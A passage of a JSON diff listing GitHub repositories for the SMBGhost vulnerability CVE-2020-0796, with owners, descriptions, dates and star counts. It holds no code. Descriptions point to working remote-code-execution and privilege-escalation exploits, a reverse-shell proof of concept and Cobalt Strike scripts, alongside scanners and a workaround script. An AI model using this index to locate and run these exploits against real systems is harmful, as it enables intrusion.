"visibility": "public", + "forks": 8, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 246927086, + "name": "SMBGhost-WorkaroundApplier", + "full_name": "Almorabea\/SMBGhost-WorkaroundApplier", + "owner": { + "login": "Almorabea", + "id": 13198863, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13198863?v=4", + "html_url": "https:\/\/github.com\/Almorabea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Almorabea\/SMBGhost-WorkaroundApplier", + "description": "This script will apply the workaround for the vulnerability CVE-2020-0796 for the SMBv3 unauthenticated RCE", + "fork": false, + "created_at": "2020-03-12T20:41:30Z", + "updated_at": "2024-08-12T19:58:45Z", + "pushed_at": "2020-03-13T14:52:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 247023558, + "name": "CVE-2020-0796", + "full_name": "vysecurity\/CVE-2020-0796", + "owner": { + "login": "vysecurity", + "id": 3596242, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3596242?v=4", + "html_url": "https:\/\/github.com\/vysecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vysecurity\/CVE-2020-0796", + "description": "CVE-2020-0796 - Working PoC - 20200313", + "fork": false, + "created_at": "2020-03-13T08:34:31Z", + "updated_at": "2024-08-12T19:58:45Z", + "pushed_at": "2020-03-13T08:35:03Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 247147253, + "name": "SMBv3.1.1-scan---CVE-2020-0796", + "full_name": "BinaryShadow94\/SMBv3.1.1-scan---CVE-2020-0796", + "owner": { + "login": "BinaryShadow94", + "id": 26254187, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26254187?v=4", + "html_url": "https:\/\/github.com\/BinaryShadow94", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BinaryShadow94\/SMBv3.1.1-scan---CVE-2020-0796", + "description": "Little scanner to know if a machine is runnig SMBv3 (possible vulnerability CVE-2020-0796)", + "fork": false, + "created_at": "2020-03-13T19:27:30Z", + "updated_at": "2024-08-12T19:58:46Z", + "pushed_at": "2020-03-13T20:01:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 247195467, + "name": "SMBGhost_Scanner", + "full_name": "w1ld3r\/SMBGhost_Scanner", + "owner": { + "login": "w1ld3r", + "id": 17899389, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17899389?v=4", + "html_url": "https:\/\/github.com\/w1ld3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w1ld3r\/SMBGhost_Scanner", + "description": "Advanced scanner for CVE-2020-0796 - SMBv3 RCE ", + "fork": false, + "created_at": "2020-03-14T02:07:16Z", + "updated_at": "2024-08-12T19:58:47Z", + "pushed_at": "2023-05-22T22:42:20Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 14, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 247218948, + "name": "CVE-2020-0796", + "full_name": "wsfengfan\/CVE-2020-0796", + "owner": { + "login": "wsfengfan", + "id": 33821840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33821840?v=4", + "html_url": "https:\/\/github.com\/wsfengfan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wsfengfan\/CVE-2020-0796", + "description": "CVE-2020-0796 Python POC buffer overflow", + "fork": false, + "created_at": "2020-03-14T05:39:37Z", + "updated_at": "2024-08-12T19:58:47Z", + "pushed_at": "2020-03-14T05:51:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 247370340, + "name": "aioScan_CVE-2020-0796", + "full_name": "GuoKerS\/aioScan_CVE-2020-0796", + "owner": { + "login": "GuoKerS", + "id": 31996804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31996804?v=4", + "html_url": "https:\/\/github.com\/GuoKerS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GuoKerS\/aioScan_CVE-2020-0796", + "description": "基于asyncio(协程)的CVE-2020-0796 速度还是十分可观的,方便运维师傅们对内网做下快速检测。", + "fork": false, + "created_at": "2020-03-14T23:39:25Z", + "updated_at": "2024-08-12T19:58:48Z", + "pushed_at": "2020-03-18T04:48:23Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "asyncio", + "cve-2020-0796", + "python3" + ], + "visibility": "public", + "forks": 14, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 247393369, + "name": "CVE-2020-0796-Scanner", + "full_name": "jiansiting\/CVE-2020-0796-Scanner", + "owner": { + "login": "jiansiting", + "id": 28823754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28823754?v=4", + "html_url": "https:\/\/github.com\/jiansiting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jiansiting\/CVE-2020-0796-Scanner", + "description": "CVE-2020-0796-Scanner", + "fork": false, + "created_at": "2020-03-15T03:17:47Z", + "updated_at": "2024-08-12T19:58:49Z", + "pushed_at": "2020-03-15T03:25:41Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 247561192, + "name": "Unauthenticated-CVE-2020-0796-PoC", + "full_name": "maxpl0it\/Unauthenticated-CVE-2020-0796-PoC", + "owner": { + "login": "maxpl0it", + "id": 27973683, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27973683?v=4", + "html_url": "https:\/\/github.com\/maxpl0it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maxpl0it\/Unauthenticated-CVE-2020-0796-PoC", + "description": "An unauthenticated PoC for CVE-2020-0796", + "fork": false, + "created_at": "2020-03-15T22:17:50Z", + "updated_at": "2024-08-12T19:58:50Z", + "pushed_at": "2020-03-15T22:20:58Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 21, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 247578292, + "name": "CVE-2020-0796", + "full_name": "ran-sama\/CVE-2020-0796", + "owner": { + "login": "ran-sama", + "id": 31311154, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31311154?v=4", + "html_url": "https:\/\/github.com\/ran-sama", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ran-sama\/CVE-2020-0796", + "description": "Lightweight PoC and Scanner for CVE-2020-0796 without authentication.", + "fork": false, + "created_at": "2020-03-16T00:47:41Z", + "updated_at": "2024-08-13T19:58:45Z", + "pushed_at": "2024-08-13T19:58:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 247747657, + "name": "smbghost", + "full_name": "sujitawake\/smbghost", + "owner": { + "login": "sujitawake", + "id": 50439521, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50439521?v=4", + "html_url": "https:\/\/github.com\/sujitawake", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sujitawake\/smbghost", + "description": "CVE-2020-0796_CoronaBlue_SMBGhost", + "fork": false, + "created_at": "2020-03-16T15:31:52Z", + "updated_at": "2024-08-12T19:58:52Z", + "pushed_at": "2020-03-19T08:06:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 247749832, + "name": "CVE-2020-0796", + "full_name": "julixsalas\/CVE-2020-0796", + "owner": { + "login": "julixsalas", + "id": 7083476, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7083476?v=4", + "html_url": "https:\/\/github.com\/julixsalas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/julixsalas\/CVE-2020-0796", + "description": "Scanner for CVE-2020-0796", + "fork": false, + "created_at": "2020-03-16T15:39:22Z", + "updated_at": "2024-08-12T19:58:52Z", + "pushed_at": "2022-01-28T12:14:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 249034829, + "name": "CVE-2020-0796-DoS", + "full_name": "cory-zajicek\/CVE-2020-0796-DoS", + "owner": { + "login": "cory-zajicek", + "id": 62479809, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62479809?v=4", + "html_url": "https:\/\/github.com\/cory-zajicek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cory-zajicek\/CVE-2020-0796-DoS", + "description": "DoS PoC for CVE-2020-0796 (SMBGhost)", + "fork": false, + "created_at": "2020-03-21T18:17:10Z", + "updated_at": "2024-08-12T19:59:06Z", + "pushed_at": "2020-03-24T05:52:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0796", + "smbghost" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 251207693, + "name": "cve-2020-0796-vuln", + "full_name": "tripledd\/cve-2020-0796-vuln", + "owner": { + "login": "tripledd", + "id": 25425306, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25425306?v=4", + "html_url": "https:\/\/github.com\/tripledd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tripledd\/cve-2020-0796-vuln", + "description": null, + "fork": false, + "created_at": "2020-03-30T05:13:16Z", + "updated_at": "2020-03-30T05:14:12Z", + "pushed_at": "2020-03-30T05:14:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 251287681, + "name": "CVE-2020-0796", + "full_name": "danigargu\/CVE-2020-0796", + "owner": { + "login": "danigargu", + "id": 1675387, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1675387?v=4", + "html_url": "https:\/\/github.com\/danigargu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/danigargu\/CVE-2020-0796", + "description": "CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost", + "fork": false, + "created_at": "2020-03-30T11:42:56Z", + "updated_at": "2024-11-21T08:35:28Z", + "pushed_at": "2020-12-07T20:04:27Z", + "stargazers_count": 1304, + "watchers_count": 1304, + "has_discussions": false, + "forks_count": 343, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "coronablue", + "cve-2020-0796", + "exploit", + "poc", + "smbghost" + ], + "visibility": "public", + "forks": 343, + "watchers": 1304, + "score": 0, + "subscribers_count": 34 + }, + { + "id": 251357830, + "name": "CVE-2020-0796-LPE-POC", + "full_name": "jamf\/CVE-2020-0796-LPE-POC", + "owner": { + "login": "jamf", + "id": 1423569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1423569?v=4", + "html_url": "https:\/\/github.com\/jamf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jamf\/CVE-2020-0796-LPE-POC", + "description": "CVE-2020-0796 Local Privilege Escalation POC", + "fork": false, + "created_at": "2020-03-30T16:06:50Z", + "updated_at": "2024-11-01T02:37:52Z", + "pushed_at": "2020-04-02T08:01:38Z", + "stargazers_count": 240, + "watchers_count": 240, + "has_discussions": false, + "forks_count": 85, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0796", + "poc", + "privilege-escalation", + "smbghost" + ], + "visibility": "public", + "forks": 85, + "watchers": 240, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 251510910, + "name": "CVE-2020-0796-LPE", + "full_name": "TinToSer\/CVE-2020-0796-LPE", + "owner": { + "login": "TinToSer", + "id": 52107530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52107530?v=4", + "html_url": "https:\/\/github.com\/TinToSer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TinToSer\/CVE-2020-0796-LPE", + "description": "SMBGHOST local privilege escalation", + "fork": false, + "created_at": "2020-03-31T05:41:30Z", + "updated_at": "2024-08-12T19:59:30Z", + "pushed_at": "2020-03-31T05:45:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "coronablue-exploit", + "latest-windows-exploit", + "smbghost-lpe", + "windows-local-exploit", + "windows-lpe", + "windows10-local-exploit" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 251582597, + "name": "CVE-2020-0796-LPE-EXP", + "full_name": "f1tz\/CVE-2020-0796-LPE-EXP", + "owner": { + "login": "f1tz", + "id": 24809993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24809993?v=4", + "html_url": "https:\/\/github.com\/f1tz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f1tz\/CVE-2020-0796-LPE-EXP", + "description": "Windows SMBv3 LPE exploit 已编译版", + "fork": false, + "created_at": "2020-03-31T11:25:50Z", + "updated_at": "2024-08-12T19:59:31Z", + "pushed_at": "2020-03-31T11:34:02Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 251703712, + "name": "CVE-2020-0796", + "full_name": "tango-j\/CVE-2020-0796", + "owner": { + "login": "tango-j", + "id": 18386443, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18386443?v=4", + "html_url": "https:\/\/github.com\/tango-j", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tango-j\/CVE-2020-0796", + "description": "Coronablue exploit", + "fork": false, + "created_at": "2020-03-31T19:01:52Z", + "updated_at": "2024-08-12T19:59:32Z", + "pushed_at": "2020-03-31T19:05:32Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 252043679, + "name": "CVE-2020-0796", + "full_name": "jiansiting\/CVE-2020-0796", + "owner": { + "login": "jiansiting", + "id": 28823754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28823754?v=4", + "html_url": "https:\/\/github.com\/jiansiting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jiansiting\/CVE-2020-0796", + "description": null, + "fork": false, + "created_at": "2020-04-01T01:46:08Z", + "updated_at": "2024-11-25T11:10:19Z", + "pushed_at": "2020-04-01T01:46:17Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 62, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 252445301, + "name": "CVE-2020-0796-SMB", + "full_name": "eastmountyxz\/CVE-2020-0796-SMB", + "owner": { + "login": "eastmountyxz", + "id": 53172375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53172375?v=4", + "html_url": "https:\/\/github.com\/eastmountyxz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eastmountyxz\/CVE-2020-0796-SMB", + "description": "该资源为CVE-2020-0796漏洞复现,包括Python版本和C++版本。主要是集合了github大神们的资源,希望您喜欢~", + "fork": false, + "created_at": "2020-04-02T12:12:03Z", + "updated_at": "2024-08-12T19:59:37Z", + "pushed_at": "2020-08-28T09:21:00Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 32, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 252494911, + "name": "CVE-2020-0796-EXP", + "full_name": "LabDookhtegan\/CVE-2020-0796-EXP", + "owner": { + "login": "LabDookhtegan", + "id": 63061898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63061898?v=4", + "html_url": "https:\/\/github.com\/LabDookhtegan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LabDookhtegan\/CVE-2020-0796-EXP", + "description": "CVE-2020-0796-EXP", + "fork": false, + "created_at": "2020-04-02T15:32:10Z", + "updated_at": "2024-08-12T19:59:36Z", + "pushed_at": "2020-04-03T00:19:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 253535658, + "name": "CVE_2020_0796_CNA", + "full_name": "Rvn0xsy\/CVE_2020_0796_CNA", + "owner": { + "login": "Rvn0xsy", + "id": 19944759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19944759?v=4", + "html_url": "https:\/\/github.com\/Rvn0xsy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rvn0xsy\/CVE_2020_0796_CNA", + "description": "Cobalt Strike AggressorScripts CVE-2020-0796", + "fork": false, + "created_at": "2020-04-06T15:16:10Z", + "updated_at": "2024-08-12T19:59:48Z", + "pushed_at": "2020-09-09T09:42:22Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 78, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 253927600, + "name": "cve-2020-0796", + "full_name": "0xeb-bp\/cve-2020-0796", + "owner": { + "login": "0xeb-bp", + "id": 53204152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53204152?v=4", + "html_url": "https:\/\/github.com\/0xeb-bp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xeb-bp\/cve-2020-0796", + "description": "CVE-2020-0796 (SMBGhost) LPE", + "fork": false, + "created_at": "2020-04-07T22:35:57Z", + "updated_at": "2024-08-12T19:59:53Z", + "pushed_at": "2020-04-08T01:21:30Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 255573167, + "name": "cve-2020-0796-Scanner", + "full_name": "intelliroot-tech\/cve-2020-0796-Scanner", + "owner": { + "login": "intelliroot-tech", + "id": 62929839, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62929839?v=4", + "html_url": "https:\/\/github.com\/intelliroot-tech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/intelliroot-tech\/cve-2020-0796-Scanner", + "description": "This tool helps scan large subnets for cve-2020-0796 vulnerable systems", + "fork": false, + "created_at": "2020-04-14T10:01:05Z", + "updated_at": "2024-08-12T20:00:09Z", + "pushed_at": "2020-04-14T10:56:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 257308744, + "name": "CVE-2020-0796-RCE-POC", + "full_name": "jamf\/CVE-2020-0796-RCE-POC", + "owner": { + "login": "jamf", + "id": 1423569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1423569?v=4", + "html_url": "https:\/\/github.com\/jamf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jamf\/CVE-2020-0796-RCE-POC", + "description": "CVE-2020-0796 Remote Code Execution POC", + "fork": false, + "created_at": "2020-04-20T14:35:48Z", + "updated_at": "2024-11-22T09:41:23Z", + "pushed_at": "2020-06-09T20:46:45Z", + "stargazers_count": 539, + "watchers_count": 539, + "has_discussions": false, + "forks_count": 169, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0796", + "poc", + "rce", + "remote-code-execution", + "smbghost" + ], + "visibility": "public", + "forks": 169, + "watchers": 539, + "score": 0, + "subscribers_count": 26 + }, + { + "id": 257849182, + "name": "CVE-2020-0796", + "full_name": "thelostworldFree\/CVE-2020-0796", + "owner": { + "login": "thelostworldFree", + "id": 24971604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24971604?v=4", + "html_url": "https:\/\/github.com\/thelostworldFree", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thelostworldFree\/CVE-2020-0796", + "description": "PoC RCE Reverse Shell for CVE-2020-0796 (SMBGhost)", + "fork": false, + "created_at": "2020-04-22T09:09:02Z", + "updated_at": "2024-08-12T20:00:34Z", + "pushed_at": "2020-06-05T16:21:55Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 257943564, + "name": "CVE-2020-0796", + "full_name": "section-c\/CVE-2020-0796", + "owner": { + "login": "section-c", + "id": 19670854, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19670854?v=4", + "html_url": "https:\/\/github.com\/section-c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/section-c\/CVE-2020-0796", + "description": null, + "fork": false, + "created_at": "2020-04-22T15:33:49Z", + "updated_at": "2020-04-22T15:33:49Z", + "pushed_at": "2020-04-22T15:33:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263364082, + "name": "SMBGhostScanner", + "full_name": "bacth0san96\/SMBGhostScanner", + "owner": { + "login": "bacth0san96", + "id": 48118750, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48118750?v=4", + "html_url": "https:\/\/github.com\/bacth0san96", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bacth0san96\/SMBGhostScanner", + "description": "SMBGhost CVE-2020-0796", + "fork": false, + "created_at": "2020-05-12T14:41:27Z", + "updated_at": "2021-04-20T10:00:40Z", + "pushed_at": "2021-04-20T10:00:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 267537901, + "name": "CVE-2020-0796", + "full_name": "halsten\/CVE-2020-0796", + "owner": { + "login": "halsten", + "id": 1148288, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1148288?v=4", + "html_url": "https:\/\/github.com\/halsten", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/halsten\/CVE-2020-0796", + "description": null, + "fork": false, + "created_at": "2020-05-28T08:41:12Z", + "updated_at": "2020-05-28T08:42:12Z", + "pushed_at": "2020-05-28T08:42:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 268789835, + "name": "CVE-2020-0796", + "full_name": "ysyyrps123\/CVE-2020-0796", + "owner": { + "login": "ysyyrps123", + "id": 51252462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51252462?v=4", + "html_url": "https:\/\/github.com\/ysyyrps123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ysyyrps123\/CVE-2020-0796", + "description": "CVE-2020-0796", + "fork": false, + "created_at": "2020-06-02T12:04:30Z", + "updated_at": "2020-06-02T12:04:30Z", + "pushed_at": "2020-06-02T12:04:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 268789911, + "name": "CVE-2020-0796-exp", + "full_name": "ysyyrps123\/CVE-2020-0796-exp", + "owner": { + "login": "ysyyrps123", + "id": 51252462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51252462?v=4", + "html_url": "https:\/\/github.com\/ysyyrps123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ysyyrps123\/CVE-2020-0796-exp", + "description": "CVE-2020-0796-exp", + "fork": false, + "created_at": "2020-06-02T12:04:53Z", + "updated_at": "2020-11-11T02:36:17Z", + "pushed_at": "2020-11-11T02:36:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 270919583, + "name": "CVE-2020-0796", + "full_name": "exp-sky\/CVE-2020-0796", + "owner": { + "login": "exp-sky", + "id": 5362303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5362303?v=4", + "html_url": "https:\/\/github.com\/exp-sky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exp-sky\/CVE-2020-0796", + "description": "SMBv3 Ghost (CVE-2020-0796) Vulnerability", + "fork": false, + "created_at": "2020-06-09T06:18:54Z", + "updated_at": "2020-06-10T12:36:18Z", + "pushed_at": "2020-06-09T07:25:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 271332683, + "name": "SMBGhost_AutomateExploitation", + "full_name": "Barriuso\/SMBGhost_AutomateExploitation", + "owner": { + "login": "Barriuso", + "id": 16231048, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16231048?v=4", + "html_url": "https:\/\/github.com\/Barriuso", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Barriuso\/SMBGhost_AutomateExploitation", + "description": "SMBGhost (CVE-2020-0796) Automate Exploitation and Detection", + "fork": false, + "created_at": "2020-06-10T16:44:39Z", + "updated_at": "2024-11-16T11:15:39Z", + "pushed_at": "2022-03-30T14:02:04Z", + "stargazers_count": 270, + "watchers_count": 270, + "has_discussions": false, + "forks_count": 52, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 52, + "watchers": 270, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 271468541, + "name": "SMBGhost", + "full_name": "1060275195\/SMBGhost", + "owner": { + "login": "1060275195", + "id": 37568190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37568190?v=4", + "html_url": "https:\/\/github.com\/1060275195", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1060275195\/SMBGhost", + "description": "批量测试CVE-2020-0796 - SMBv3 RCE", + "fork": false, + "created_at": "2020-06-11T06:24:30Z", + "updated_at": "2020-09-28T13:21:59Z", + "pushed_at": "2020-06-03T04:01:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + 